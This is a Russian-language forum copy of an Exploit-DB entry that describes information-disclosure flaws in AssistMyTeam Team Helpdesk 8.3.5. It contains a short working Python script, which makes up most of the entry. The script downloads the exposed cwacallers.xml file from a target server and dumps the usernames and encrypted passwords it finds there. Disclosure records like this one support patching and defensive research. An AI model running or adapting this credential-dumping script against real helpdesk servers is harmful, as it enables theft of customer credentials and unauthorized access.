- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39175
- Проверка EDB
-
- Пройдено
- Автор
- BHAMB
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2014-05-05
AssistMyTeam Team Helpdesk - Multiple Information Disclosure Vulnerabilities
Код:
source: https://www.securityfocus.com/bid/67271/info
AssistMyTeam Team Helpdesk is prone to multiple information-disclosure vulnerabilities.
Successfully exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.
Team Helpdesk 8.3.5 is vulnerable; other versions may also be affected.
#!/usr/bin/python
import sys
import re
import os
import subprocess
print "This is an User Credential Dump for Team Helpdesk Customer Wev Service 8.3.5 (and prior) by bhamb.\n"
print "Send any comment to [email protected]\n"
if len(sys.argv) != 2:
print('Usage: user_cred_dump.py https://Hostname.com')
exit(1)
hostname=sys.argv[1]+"/cws/bin/cwacallers.xml"
print hostname
subprocess.Popen(['wget', '--no-check-certificate',hostname]).communicate()
print "The following usernames and encrypted password were found.\n"
cmd="cat cwacallers.xml | grep '@' | cut -d'\"' -f4,6 | sed 's/\"/:/g' "
test=os.system(cmd)- Источник
- www.exploit-db.com
